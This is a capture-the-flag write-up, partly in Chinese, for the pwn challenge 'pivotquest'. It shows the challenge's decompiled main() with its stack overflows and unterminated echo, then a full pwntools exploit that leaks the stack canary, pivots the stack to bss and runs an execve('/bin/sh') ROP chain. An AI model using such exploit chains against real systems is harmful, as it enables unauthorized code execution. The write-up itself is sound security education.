Pwn CTF pivotquest Writeup

kazma 成大資安社 創辦人/社長

Exploitation

先看一下這題的主邏輯:

/*
 * Hex-Rays decompilation of the challenge's main().
 * It forks; the child and then the parent each read user input into the
 * same 24-byte stack buffer and echo it back with printf(). The `unk_*`
 * names are data references the decompiler could not resolve, and the
 * register-named locals below are decompiler artifacts (unused argument
 * slots), not real program variables.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
int edx; // edx  -- never assigned; passed through to printf as a leftover register
int ecx; // ecx
int r8; // r8d
int r9; // r9d
int edx2; // edx
int ecx2; // ecx
int r82; // r8d
int r92; // r9d
char v12[4]; // [rsp+8h] [rbp-28h] BYREF  -- status slot handed to waitpid()
unsigned int v13; // [rsp+Ch] [rbp-24h]  -- pid returned by fork()
char buf[24]; // [rsp+10h] [rbp-20h] BYREF  -- input buffer; the canary sits at rbp-8h, immediately after it
unsigned __int64 canary; // [rsp+28h] [rbp-8h]  -- stack-protector value loaded from fs:0x28

canary = __readfsqword(0x28u);
init(argc, argv, envp); // defined elsewhere in the binary; not visible here
v13 = fork();
if ( v13 == -1 )
{
perror("fork error");
exit(1LL);
}
if ( !v13 )
{
// Child process.
// Defect 1: read() of up to 48 bytes into a 24-byte buffer (stack overflow
// toward the canary and the saved frame). Defect 2: the input is never
// NUL-terminated and the read() return value is ignored, so the format in
// unk_499037 (presumably a "%s"-style format, per the echo behaviour the
// write-up describes) keeps printing past buf into adjacent stack bytes.
// Mitigation: bound the read to sizeof buf - 1, check its return value,
// and terminate the buffer before printing it.
puts(&unk_499018);
read(0LL, buf, 48LL);
printf((unsigned int)&unk_499037, (unsigned int)buf, edx, ecx, r8, r9); // (unsigned int) casts are decompiler noise
exit(0LL);
}
// Parent process: waits for the child, then repeats the same unchecked,
// unterminated read/echo pattern with an even larger 96-byte read into
// the same 24-byte buffer.
waitpid(v13, v12, 0LL);
puts("Kid's missing... Again?");
read(0LL, buf, 96LL);
printf((unsigned int)&unk_499037, (unsigned int)buf, edx2, ecx2, r82, r92);
return 0;
}

有 canary 沒有 PIE,然後有兩個輸入點都可以 overflow,而且是 statically linked。
首先第一步是我們可以透過填滿 canary 前的空間讓他 printf 的時候一直印到 canary 的 null byte 為止,這樣我們就可以先取得 canary,然後再透過 migration 把 stack 搬到 bss 段,接著第二次輸入時就可以正常 rop 而且 /bin/sh 是在 bss 段了。

Exploit

# Proof-of-concept for the pivotquest challenge (pwntools), as published in the
# write-up. It exercises the two weaknesses visible in the decompiled main():
# the echoed input is never NUL-terminated (so adjacent stack bytes, including
# the canary, are printed back), and read() accepts far more bytes than the
# 24-byte buffer holds. All addresses below are specific to this statically
# linked, non-PIE challenge binary and were resolved by the author.
from pwn import *

p = process('./pivotquest')
elf = ELF('./pivotquest')

bss = elf.bss() + 0x500  # writable region at a fixed address; used as the relocated stack frame
main = elf.symbols['main']  # looked up but not used below

# Gadget / call-site addresses from the challenge binary (page-specific values).
pop_rax_ret = 0x451037
pop_rdi_ret = 0x401f9f
pop_rsi_ret = 0x409fce
syscall = 0x401d54
read2 = 0x4018b4  # presumably a read() call site inside main(); re-entered to take the third input
# Stage 1 (child): fill buf with 0x18 bytes. Because the binary never
# terminates the buffer, the echo continues into the canary; its low byte
# is always 0x00, which is why only 7 bytes are received and a zero byte is
# prepended. Note that sendline() also appends '\n', which is what the
# recvuntil(b'a\n') below synchronises on.
p.sendline(b'a' * 0x18)
p.recvuntil(b'a\n')
canary = u64(b'\x00' + p.recv(7))
print(hex(canary))

# Stage 2 (parent): the leaked canary is replayed so the stack-protector check
# passes; the saved rbp is replaced with the bss address and the return address
# with read2, so the next input is read into the relocated frame (stack pivot).
# The child has already exited, so its canary failure does not affect the parent.
p.recvuntil(b'?\n')
p.send(b'a' * 0x18 + p64(canary) + p64(bss) + p64(read2))

# Stage 3: the data placed at the relocated frame. '/bin/sh\x00' lands at
# bss - 0x20 (the buffer offset relative to rbp seen in the decompilation),
# followed by the canary, a new rbp and a short execve(59) chain.
payload = b'/bin/sh\x00' + b'a' * 0x10 + p64(canary) + p64(bss)

payload += flat([pop_rdi_ret, bss - 0x20,
pop_rsi_ret, 0,
pop_rax_ret, 59,
syscall])

p.send(payload)

p.interactive()

Pwned !!!

  • Title: Pwn CTF pivotquest Writeup
  • Author: kazma
  • Created at : 2024-11-11 19:44:15
  • Updated at : 2024-11-11 19:55:57
  • Link: https://kazma.tw/2024/11/11/Pwn-CTF-pivotquest-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.